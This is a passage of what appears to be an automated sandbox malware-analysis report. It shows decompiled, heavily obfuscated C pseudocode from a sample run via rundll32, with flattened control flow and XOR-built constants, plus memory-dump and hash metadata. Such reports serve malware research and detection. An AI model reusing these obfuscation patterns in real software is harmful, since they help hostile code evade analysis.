                                                                                                                                    				E002D20B9(_t92);
                                                                                                                                    				_v52 = _v52 & 0x00000000;
                                                                                                                                    				_v56 = 0x878462;
                                                                                                                                    				_t113 = _t112 + 0x14;
                                                                                                                                    				_v32 = 0x956791;
                                                                                                                                    				_t101 = 0x1300659;
                                                                                                                                    				_v32 = _v32 + 0xffff68af;
                                                                                                                                    				_v32 = _v32 ^ 0x0094d050;
                                                                                                                                    				_v48 = 0xb6c679;
                                                                                                                                    				_v48 = _v48 * 9;
                                                                                                                                    				_v48 = _v48 ^ 0x0662f925;
                                                                                                                                    				_v16 = 0xd9c762;
                                                                                                                                    				_v16 = _v16 << 1;
                                                                                                                                    				_v16 = _v16 | 0xb4c78449;
                                                                                                                                    				_v16 = _v16 ^ 0xb5f30401;
                                                                                                                                    				_v40 = 0x8b331e;
                                                                                                                                    				_v40 = _v40 >> 0xc;
                                                                                                                                    				_v40 = _v40 ^ 0x000c5129;
                                                                                                                                    				_v28 = 0x1269f4;
                                                                                                                                    				_v28 = _v28 >> 4;
                                                                                                                                    				_v28 = _v28 ^ 0x0007e996;
                                                                                                                                    				_v44 = 0xabd705;
                                                                                                                                    				_v44 = _v44 ^ 0x9c90d177;
                                                                                                                                    				_v44 = _v44 ^ 0x9c3fe788;
                                                                                                                                    				_v8 = 0x357d72;
                                                                                                                                    				_v8 = _v8 + 0xd90c;
                                                                                                                                    				_v8 = _v8 ^ 0xccfdbdcb;
                                                                                                                                    				_v8 = _v8 >> 3;
                                                                                                                                    				_v8 = _v8 ^ 0x199e890f;
                                                                                                                                    				_v12 = 0x32e6;
                                                                                                                                    				_v12 = _v12 ^ 0x74a35607;
                                                                                                                                    				_v12 = _v12 | 0x704b9008;
                                                                                                                                    				_v12 = _v12 + 0xffff83aa;
                                                                                                                                    				_v12 = _v12 ^ 0x74eee325;
                                                                                                                                    				_v36 = 0xeddfb6;
                                                                                                                                    				_v36 = _v36 << 0xa;
                                                                                                                                    				_v36 = _v36 ^ 0xb77b8cf2;
                                                                                                                                    				_v24 = 0xe2b758;
                                                                                                                                    				_v24 = _v24 << 5;
                                                                                                                                    				_v24 = _v24 * 0x38;
                                                                                                                                    				_v24 = _v24 ^ 0x330719f5;
                                                                                                                                    				_v20 = 0x9236d6;
                                                                                                                                    				_v20 = _v20 | 0x3f0523f5;
                                                                                                                                    				_v20 = _v20 >> 0xd;
                                                                                                                                    				_v20 = _v20 ^ 0x000835ca;
                                                                                                                                    				do {
                                                                                                                                    					while(_t101 != 0x1300659) {
                                                                                                                                    						if(_t101 == 0xa264c44) {
                                                                                                                                    							_t96 = E002C9D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
                                                                                                                                    							_t113 = _t113 + 0x10;
                                                                                                                                    							_t101 = 0xbcabc0e;
                                                                                                                                    							continue;
                                                                                                                                    						}
                                                                                                                                    						if(_t101 != 0xbcabc0e) {
                                                                                                                                    							goto L8;
                                                                                                                                    						}
                                                                                                                                    						return E002D6637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
                                                                                                                                    					}
                                                                                                                                    					_t96 = E002C4B61( &_v88, _v32, _v48, _v16);
                                                                                                                                    					_t101 = 0xa264c44;
                                                                                                                                    					L8:
                                                                                                                                    				} while (_t101 != 0x478adce);
                                                                                                                                    				return _t96;
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: %t$DL&$r}5
                                                                                                                                    • API String ID: 0-2337153543
                                                                                                                                    • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                    • Instruction ID: 202fef910f33b26175dd71cafc0056d17ac2a2eaac3c0b32b68ea241994a123c
                                                                                                                                    • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                                    • Instruction Fuzzy Hash: C4413271D0020EEBCF09DFE5D94A8EEBBB1FB48318F208189D41276220D3B54A59CFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1958600898-0
                                                                                                                                    • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                    • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                                    • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                                    • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002D1889(void* __ecx) {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				short _v1564;
                                                                                                                                    				intOrPtr _v1568;
                                                                                                                                    				signed int _v1572;
                                                                                                                                    				signed int _v1576;
                                                                                                                                    				signed int _v1580;
                                                                                                                                    				signed int _v1584;
                                                                                                                                    				signed int _v1588;
                                                                                                                                    				signed int _v1592;
                                                                                                                                    				signed int _v1596;
                                                                                                                                    				signed int _v1600;
                                                                                                                                    				signed int _v1604;
                                                                                                                                    				signed int _v1608;
                                                                                                                                    				signed int _v1612;
                                                                                                                                    				signed int _v1616;
                                                                                                                                    				signed int _v1620;
                                                                                                                                    				signed int _v1624;
                                                                                                                                    				signed int _v1628;
                                                                                                                                    				signed int _v1632;
                                                                                                                                    				signed int _v1636;
                                                                                                                                    				signed int _v1640;
                                                                                                                                    				signed int _v1644;
                                                                                                                                    				signed int _v1648;
                                                                                                                                    				signed int _v1652;
                                                                                                                                    				signed int _v1656;
                                                                                                                                    				signed int _v1660;
                                                                                                                                    				signed int _v1664;
                                                                                                                                    				signed int _v1668;
                                                                                                                                    				signed int _v1672;
                                                                                                                                    				signed int _v1676;
                                                                                                                                    				signed int _v1680;
                                                                                                                                    				signed int _t323;
                                                                                                                                    				signed int _t334;
                                                                                                                                    				signed int _t337;
                                                                                                                                    				signed int _t338;
                                                                                                                                    				signed int _t339;
                                                                                                                                    				signed int _t340;
                                                                                                                                    				signed int _t341;
                                                                                                                                    				signed int _t342;
                                                                                                                                    				signed int _t343;
                                                                                                                                    				signed int _t344;
                                                                                                                                    				signed int _t345;
                                                                                                                                    				signed int _t346;
                                                                                                                                    				void* _t386;
                                                                                                                                    				void* _t387;
                                                                                                                                    				signed int* _t390;
                                                                                                                                    
                                                                                                                                    				_t390 =  &_v1680;
                                                                                                                                    				_v1568 = 0xdfec4c;
                                                                                                                                    				_t386 = __ecx;
                                                                                                                                    				_v1564 = 0;
                                                                                                                                    				_t387 = 0xea1969c;
                                                                                                                                    				_v1596 = 0xb94d4f;
                                                                                                                                    				_v1596 = _v1596 >> 2;
                                                                                                                                    				_v1596 = _v1596 ^ 0x002b88ba;
                                                                                                                                    				_v1604 = 0x7820e8;
                                                                                                                                    				_t9 =  &_v1604; // 0x7820e8
                                                                                                                                    				_t337 = 0x3f;
                                                                                                                                    				_v1604 =  *_t9 / _t337;
                                                                                                                                    				_v1604 = _v1604 << 6;
                                                                                                                                    				_v1604 = _v1604 ^ 0x0075b154;
                                                                                                                                    				_v1676 = 0xd796f6;
                                                                                                                                    				_v1676 = _v1676 << 7;
                                                                                                                                    				_t338 = 0x1f;
                                                                                                                                    				_v1676 = _v1676 / _t338;
                                                                                                                                    				_v1676 = _v1676 | 0x34dfec15;
                                                                                                                                    				_v1676 = _v1676 ^ 0x37fcd475;
                                                                                                                                    				_v1580 = 0x701ced;
                                                                                                                                    				_t339 = 0x3b;
                                                                                                                                    				_v1580 = _v1580 / _t339;
                                                                                                                                    				_v1580 = _v1580 ^ 0x000eda5b;
                                                                                                                                    				_v1584 = 0x3864f;
                                                                                                                                    				_v1584 = _v1584 | 0xebab6106;
                                                                                                                                    				_v1584 = _v1584 ^ 0xeba3c8dc;
                                                                                                                                    				_v1668 = 0x7d6229;
                                                                                                                                    				_v1668 = _v1668 + 0x90f9;
                                                                                                                                    				_t340 = 0x7d;
                                                                                                                                    				_v1668 = _v1668 * 0xd;
                                                                                                                                    				_v1668 = _v1668 + 0x17d6;
                                                                                                                                    				_v1668 = _v1668 ^ 0x06671cb6;
                                                                                                                                    				_v1652 = 0x8dafad;
                                                                                                                                    				_v1652 = _v1652 + 0xffffa237;
                                                                                                                                    				_v1652 = _v1652 / _t340;
                                                                                                                                    				_v1652 = _v1652 ^ 0xeab94c45;
                                                                                                                                    				_v1652 = _v1652 ^ 0xeabb4144;
                                                                                                                                    				_v1620 = 0x364acf;
                                                                                                                                    				_v1620 = _v1620 + 0xffffd559;
                                                                                                                                    				_v1620 = _v1620 ^ 0x476b0832;
                                                                                                                                    				_v1620 = _v1620 ^ 0x4757dcec;
                                                                                                                                    				_v1660 = 0xdffac8;
                                                                                                                                    				_v1660 = _v1660 | 0xd3f81aab;
                                                                                                                                    				_t341 = 0xd;
                                                                                                                                    				_v1660 = _v1660 / _t341;
                                                                                                                                    				_v1660 = _v1660 + 0x2ca8;
                                                                                                                                    				_v1660 = _v1660 ^ 0x10473906;
                                                                                                                                    				_v1636 = 0xafa95;
                                                                                                                                    				_v1636 = _v1636 | 0x12b9adda;
                                                                                                                                    				_v1636 = _v1636 + 0xca30;
                                                                                                                                    				_t342 = 0x24;
                                                                                                                                    				_v1636 = _v1636 / _t342;
                                                                                                                                    				_v1636 = _v1636 ^ 0x008bc8e6;
                                                                                                                                    				_v1612 = 0xa1b06d;
                                                                                                                                    				_v1612 = _v1612 ^ 0xd927b519;
                                                                                                                                    				_t334 = 0x1c;
                                                                                                                                    				_v1612 = _v1612 / _t334;
                                                                                                                                    				_v1612 = _v1612 ^ 0x07c55aff;
                                                                                                                                    				_v1628 = 0xe475d7;
                                                                                                                                    				_v1628 = _v1628 + 0xf351;
                                                                                                                                    				_v1628 = _v1628 >> 9;
                                                                                                                                    				_v1628 = _v1628 ^ 0x000b149a;
                                                                                                                                    				_v1644 = 0xc98f78;
                                                                                                                                    				_v1644 = _v1644 + 0xa497;
                                                                                                                                    				_v1644 = _v1644 + 0xab0a;
                                                                                                                                    				_v1644 = _v1644 ^ 0x9916dffd;
                                                                                                                                    				_v1644 = _v1644 ^ 0x99d32d23;
                                                                                                                                    				_v1572 = 0xdb2c8b;
                                                                                                                                    				_v1572 = _v1572 ^ 0xa2354bd4;
                                                                                                                                    				_v1572 = _v1572 ^ 0xa2e9b3f6;
                                                                                                                                    				_v1616 = 0x8ac290;
                                                                                                                                    				_v1616 = _v1616 | 0xd6340cba;
                                                                                                                                    				_t343 = 0x17;
                                                                                                                                    				_v1616 = _v1616 / _t343;
                                                                                                                                    				_v1616 = _v1616 ^ 0x095403ec;
                                                                                                                                    				_v1624 = 0xc9b33;
                                                                                                                                    				_v1624 = _v1624 | 0xadec2c36;
                                                                                                                                    				_t344 = 0x23;
                                                                                                                                    				_v1624 = _v1624 / _t344;
                                                                                                                                    				_v1624 = _v1624 ^ 0x04f29945;
                                                                                                                                    				_v1672 = 0xce6284;
                                                                                                                                    				_t345 = 0x1b;
                                                                                                                                    				_v1672 = _v1672 * 0x47;
                                                                                                                                    				_v1672 = _v1672 >> 0xb;
                                                                                                                                    				_v1672 = _v1672 | 0xab5418c0;
                                                                                                                                    				_v1672 = _v1672 ^ 0xab589207;
                                                                                                                                    				_v1680 = 0xfb4294;
                                                                                                                                    				_v1680 = _v1680 * 0x56;
                                                                                                                                    				_v1680 = _v1680 >> 0xe;
                                                                                                                                    				_v1680 = _v1680 >> 4;
                                                                                                                                    				_v1680 = _v1680 ^ 0x000a896c;
                                                                                                                                    				_v1576 = 0xa0fe48;
                                                                                                                                    				_v1576 = _v1576 / _t345;
                                                                                                                                    				_v1576 = _v1576 ^ 0x000b8e8e;
                                                                                                                                    				_v1608 = 0x915f33;
                                                                                                                                    				_v1608 = _v1608 + 0xfa43;
                                                                                                                                    				_v1608 = _v1608 >> 0xc;
                                                                                                                                    				_v1608 = _v1608 ^ 0x000a30cc;
                                                                                                                                    				_v1648 = 0x21b71b;
                                                                                                                                    				_v1648 = _v1648 ^ 0x78ef874e;
                                                                                                                                    				_v1648 = _v1648 | 0x9c246086;
                                                                                                                                    				_v1648 = _v1648 * 0x4a;
                                                                                                                                    				_v1648 = _v1648 ^ 0x1ce73be6;
                                                                                                                                    				_v1592 = 0x926794;
                                                                                                                                    				_v1592 = _v1592 + 0xffff6f6e;
                                                                                                                                    				_v1592 = _v1592 ^ 0x009c0ed2;
                                                                                                                                    				_v1656 = 0x919083;
                                                                                                                                    				_v1656 = _v1656 / _t334;
                                                                                                                                    				_v1656 = _v1656 >> 2;
                                                                                                                                    				_t346 = 0x67;
                                                                                                                                    				_v1656 = _v1656 / _t346;
                                                                                                                                    				_v1656 = _v1656 ^ 0x0003c4fa;
                                                                                                                                    				_v1664 = 0xb12839;
                                                                                                                                    				_v1664 = _v1664 ^ 0xbcb8295e;
                                                                                                                                    				_v1664 = _v1664 + 0xe70b;
                                                                                                                                    				_v1664 = _v1664 + 0xffffbcc9;
                                                                                                                                    				_v1664 = _v1664 ^ 0xbc0a928f;
                                                                                                                                    				_v1600 = 0x37ff42;
                                                                                                                                    				_v1600 = _v1600 + 0xffff03fd;
                                                                                                                                    				_v1600 = _v1600 >> 3;
                                                                                                                                    				_v1600 = _v1600 ^ 0x000f4750;
                                                                                                                                    				_v1632 = 0xbb4856;
                                                                                                                                    				_v1632 = _v1632 * 0x4e;
                                                                                                                                    				_v1632 = _v1632 | 0xf74fdfff;
                                                                                                                                    				_v1632 = _v1632 ^ 0xff54b7ec;
                                                                                                                                    				_v1640 = 0x73c8d7;
                                                                                                                                    				_v1640 = _v1640 * 0x56;
                                                                                                                                    				_v1640 = _v1640 << 0xb;
                                                                                                                                    				_v1640 = _v1640 >> 7;
                                                                                                                                    				_v1640 = _v1640 ^ 0x005dc3ee;
                                                                                                                                    				_v1588 = 0xe2f656;
                                                                                                                                    				_t323 = _v1588 * 0x57;
                                                                                                                                    				_v1588 = _t323;
                                                                                                                                    				_v1588 = _v1588 ^ 0x4d200bca;
                                                                                                                                    				while(_t387 != 0x5de06da) {
                                                                                                                                    					if(_t387 == 0xea1969c) {
                                                                                                                                    						_t387 = 0xfa9128f;
                                                                                                                                    						continue;
                                                                                                                                    					} else {
                                                                                                                                    						_t395 = _t387 - 0xfa9128f;
                                                                                                                                    						if(_t387 != 0xfa9128f) {
                                                                                                                                    							L8:
                                                                                                                                    							__eflags = _t387 - 0xa8e801c;
                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							E002DDA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
                                                                                                                                    							 *((short*)(E002CB6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
                                                                                                                                    							E002C8969(_v1620,  &_v520, _t395, _v1660, _v1636);
                                                                                                                                    							_push(_v1644);
                                                                                                                                    							_push(_v1628);
                                                                                                                                    							E002C47CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E002DDCF7(_v1612, 0x2c1328, _t395),  &_v520, _v1672, _v1680);
                                                                                                                                    							E002CA8B0(_v1576, _t329, _v1608);
                                                                                                                                    							_t346 = _v1648;
                                                                                                                                    							_t323 = E002CEA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
                                                                                                                                    							_t390 =  &(_t390[0x17]);
                                                                                                                                    							if(_t323 != 0) {
                                                                                                                                    								_t387 = 0x5de06da;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t323;
                                                                                                                                    				}
                                                                                                                                    				_push(_v1588);
                                                                                                                                    				_push( &_v1560);
                                                                                                                                    				_push(_t346);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_v1640);
                                                                                                                                    				_t346 = _v1600;
                                                                                                                                    				_push(0);
                                                                                                                                    				_t323 = E002CAB87(_t346, _v1632, __eflags);
                                                                                                                                    				_t390 =  &(_t390[7]);
                                                                                                                                    				_t387 = 0xa8e801c;
                                                                                                                                    				goto L8;
                                                                                                                                    			}




















































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )b}$ x
                                                                                                                                    • API String ID: 0-2724122486
                                                                                                                                    • Opcode ID: 3412619c75ad2c8b5c32f5603486301616cb7bc5ec9dde7f90fdde49d72bf54d
                                                                                                                                    • Instruction ID: 3b4bd2295b50016b2c681a925da495ab3766545c3eab0a3094a4889a0f9eeb1c
                                                                                                                                    • Opcode Fuzzy Hash: 3412619c75ad2c8b5c32f5603486301616cb7bc5ec9dde7f90fdde49d72bf54d
                                                                                                                                    • Instruction Fuzzy Hash: 19D1307150C3819FE368CF20C48A95BFBE2FBD5358F108A2DF29996260D7B58959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                    			E002D473C() {
                                                                                                                                    				intOrPtr _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				void* _t218;
                                                                                                                                    				signed int _t219;
                                                                                                                                    				void* _t225;
                                                                                                                                    				void* _t246;
                                                                                                                                    				intOrPtr _t251;
                                                                                                                                    				signed int _t252;
                                                                                                                                    				signed int _t253;
                                                                                                                                    				signed int _t254;
                                                                                                                                    				signed int _t255;
                                                                                                                                    				signed int _t256;
                                                                                                                                    				signed int _t257;
                                                                                                                                    				intOrPtr _t258;
                                                                                                                                    				intOrPtr* _t259;
                                                                                                                                    				signed int _t260;
                                                                                                                                    				signed int* _t261;
                                                                                                                                    
                                                                                                                                    				_t261 =  &_v100;
                                                                                                                                    				_v12 = 0xf244e3;
                                                                                                                                    				_v8 = 0x291d6d;
                                                                                                                                    				_t225 = 0x37f2dd7;
                                                                                                                                    				_t251 = 0;
                                                                                                                                    				_v4 = 0;
                                                                                                                                    				_v68 = 0x555e8d;
                                                                                                                                    				_v68 = _v68 + 0xfffff532;
                                                                                                                                    				_v68 = _v68 | 0x235b50f0;
                                                                                                                                    				_v68 = _v68 ^ 0x235e53ff;
                                                                                                                                    				_v84 = 0xf72ec;
                                                                                                                                    				_v84 = _v84 >> 7;
                                                                                                                                    				_t252 = 0x19;
                                                                                                                                    				_v84 = _v84 / _t252;
                                                                                                                                    				_v84 = _v84 << 3;
                                                                                                                                    				_v84 = _v84 ^ 0x000f09df;
                                                                                                                                    				_v20 = 0xee8389;
                                                                                                                                    				_t253 = 0x51;
                                                                                                                                    				_v20 = _v20 * 0x29;
                                                                                                                                    				_v20 = _v20 ^ 0x2635dc09;
                                                                                                                                    				_v88 = 0xea545e;
                                                                                                                                    				_t30 =  &_v88; // 0xea545e
                                                                                                                                    				_v88 =  *_t30 / _t253;
                                                                                                                                    				_t36 =  &_v88; // 0xea545e
                                                                                                                                    				_t254 = 0x7a;
                                                                                                                                    				_v88 =  *_t36 * 0x1c;
                                                                                                                                    				_v88 = _v88 + 0xc9a8;
                                                                                                                                    				_v88 = _v88 ^ 0x005db592;
                                                                                                                                    				_v24 = 0x448750;
                                                                                                                                    				_v24 = _v24 / _t254;
                                                                                                                                    				_v24 = _v24 ^ 0x000cab3c;
                                                                                                                                    				_v28 = 0x8cea36;
                                                                                                                                    				_v28 = _v28 * 0x38;
                                                                                                                                    				_v28 = _v28 ^ 0x1eda9ad9;
                                                                                                                                    				_v100 = 0x8110ba;
                                                                                                                                    				_v100 = _v100 + 0x3ab9;
                                                                                                                                    				_v100 = _v100 ^ 0x336ca884;
                                                                                                                                    				_v100 = _v100 + 0xffff8c66;
                                                                                                                                    				_v100 = _v100 ^ 0x33e0711c;
                                                                                                                                    				_v64 = 0x5ca85e;
                                                                                                                                    				_v64 = _v64 >> 0x10;
                                                                                                                                    				_v64 = _v64 * 0x4e;
                                                                                                                                    				_v64 = _v64 ^ 0x000b11ab;
                                                                                                                                    				_v44 = 0x2bb2b6;
                                                                                                                                    				_v44 = _v44 | 0xbbfbcd5f;
                                                                                                                                    				_v44 = _v44 ^ 0xbbf16182;
                                                                                                                                    				_v72 = 0x855f4c;
                                                                                                                                    				_v72 = _v72 ^ 0x87656771;
                                                                                                                                    				_v72 = _v72 * 0x71;
                                                                                                                                    				_v72 = _v72 ^ 0xf9f8e59a;
                                                                                                                                    				_v96 = 0x938339;
                                                                                                                                    				_v96 = _v96 << 8;
                                                                                                                                    				_v96 = _v96 << 0xf;
                                                                                                                                    				_v96 = _v96 ^ 0xcc040e17;
                                                                                                                                    				_v96 = _v96 ^ 0x50841052;
                                                                                                                                    				_v40 = 0xbe1d32;
                                                                                                                                    				_v40 = _v40 + 0x9b9c;
                                                                                                                                    				_v40 = _v40 ^ 0x00bc2d0e;
                                                                                                                                    				_v56 = 0x9e5686;
                                                                                                                                    				_v56 = _v56 + 0xffffd134;
                                                                                                                                    				_v56 = _v56 + 0xffff1440;
                                                                                                                                    				_v56 = _v56 ^ 0x0091c9b6;
                                                                                                                                    				_v60 = 0xb7e614;
                                                                                                                                    				_v60 = _v60 << 3;
                                                                                                                                    				_v60 = _v60 >> 8;
                                                                                                                                    				_v60 = _v60 ^ 0x00065aea;
                                                                                                                                    				_v32 = 0x537989;
                                                                                                                                    				_v32 = _v32 + 0xffff7fce;
                                                                                                                                    				_v32 = _v32 ^ 0x005430a6;
                                                                                                                                    				_v92 = 0x1586eb;
                                                                                                                                    				_t255 = 0x27;
                                                                                                                                    				_v92 = _v92 * 0x18;
                                                                                                                                    				_v92 = _v92 >> 7;
                                                                                                                                    				_v92 = _v92 * 0x26;
                                                                                                                                    				_v92 = _v92 ^ 0x009f543a;
                                                                                                                                    				_v52 = 0xc32f0b;
                                                                                                                                    				_v52 = _v52 | 0xcd8d244f;
                                                                                                                                    				_v52 = _v52 >> 4;
                                                                                                                                    				_v52 = _v52 ^ 0x0cd427c3;
                                                                                                                                    				_v36 = 0xd9cf6a;
                                                                                                                                    				_v36 = _v36 / _t255;
                                                                                                                                    				_v36 = _v36 ^ 0x000f5a1a;
                                                                                                                                    				_v16 = 0xbb623f;
                                                                                                                                    				_v16 = _v16 ^ 0xe760556d;
                                                                                                                                    				_v16 = _v16 ^ 0xe7dfff62;
                                                                                                                                    				_v76 = 0x7fa35c;
                                                                                                                                    				_v76 = _v76 >> 0xa;
                                                                                                                                    				_v76 = _v76 + 0xffff049d;
                                                                                                                                    				_v76 = _v76 ^ 0x38c60922;
                                                                                                                                    				_v76 = _v76 ^ 0xc73f93c8;
                                                                                                                                    				_v80 = 0x34ea16;
                                                                                                                                    				_v80 = _v80 | 0x70dfffff;
                                                                                                                                    				_t256 = 0x78;
                                                                                                                                    				_t257 = _v16;
                                                                                                                                    				_t260 = _v16;
                                                                                                                                    				_t224 = _v16;
                                                                                                                                    				_v80 = _v80 / _t256;
                                                                                                                                    				_v80 = _v80 ^ 0x00f0b2be;
                                                                                                                                    				_v48 = 0x2ab377;
                                                                                                                                    				_v48 = _v48 << 0xd;
                                                                                                                                    				_v48 = _v48 + 0x21bb;
                                                                                                                                    				_v48 = _v48 ^ 0x5663e2ae;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_push(0x5c);
                                                                                                                                    					while(_t225 != 0xb8820d) {
                                                                                                                                    						if(_t225 == 0x1effdba) {
                                                                                                                                    							_t219 = E002C912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
                                                                                                                                    							_t224 = _t219;
                                                                                                                                    							_t261 =  &(_t261[5]);
                                                                                                                                    							if(_t219 != 0) {
                                                                                                                                    								_t225 = 0xb9a00d9;
                                                                                                                                    								goto L11;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t225 == 0x37f2dd7) {
                                                                                                                                    								_t225 = 0x43cb3ac;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t225 == 0x43cb3ac) {
                                                                                                                                    									_t258 =  *0x2e3e10; // 0x0
                                                                                                                                    									_t259 = _t258 + 0x1c;
                                                                                                                                    									while( *_t259 != _t246) {
                                                                                                                                    										_t259 = _t259 + 2;
                                                                                                                                    									}
                                                                                                                                    									_t257 = _t259 + 2;
                                                                                                                                    									_t225 = 0x1effdba;
                                                                                                                                    									goto L12;
                                                                                                                                    								} else {
                                                                                                                                    									if(_t225 == 0x5d9bea5) {
                                                                                                                                    										E002D8F9E(_v32, _v92, _v52, _v36, _t260);
                                                                                                                                    										_t261 =  &(_t261[3]);
                                                                                                                                    										_t225 = 0xb8820d;
                                                                                                                                    										goto L11;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t225 == _t218) {
                                                                                                                                    											E002CE249(_v96, _t260, _v40, _v56, _v60);
                                                                                                                                    											_t261 =  &(_t261[3]);
                                                                                                                                    											_t251 =  !=  ? 1 : _t251;
                                                                                                                                    											_t225 = 0x5d9bea5;
                                                                                                                                    											L11:
                                                                                                                                    											_t246 = 0x5c;
                                                                                                                                    											L12:
                                                                                                                                    											_t218 = 0x9850ebe;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t225 != 0xb9a00d9) {
                                                                                                                                    												L22:
                                                                                                                                    												if(_t225 != 0x8a80d0f) {
                                                                                                                                    													continue;
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												_t260 = E002C42C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
                                                                                                                                    												_t261 =  &(_t261[5]);
                                                                                                                                    												_t218 = 0x9850ebe;
                                                                                                                                    												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
                                                                                                                                    												goto L1;
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						return _t251;
                                                                                                                                    					}
                                                                                                                                    					E002D8F9E(_v16, _v76, _v80, _v48, _t224);
                                                                                                                                    					_t261 =  &(_t261[3]);
                                                                                                                                    					_t225 = 0x8a80d0f;
                                                                                                                                    					_t218 = 0x9850ebe;
                                                                                                                                    					_t246 = 0x5c;
                                                                                                                                    					goto L22;
                                                                                                                                    				}
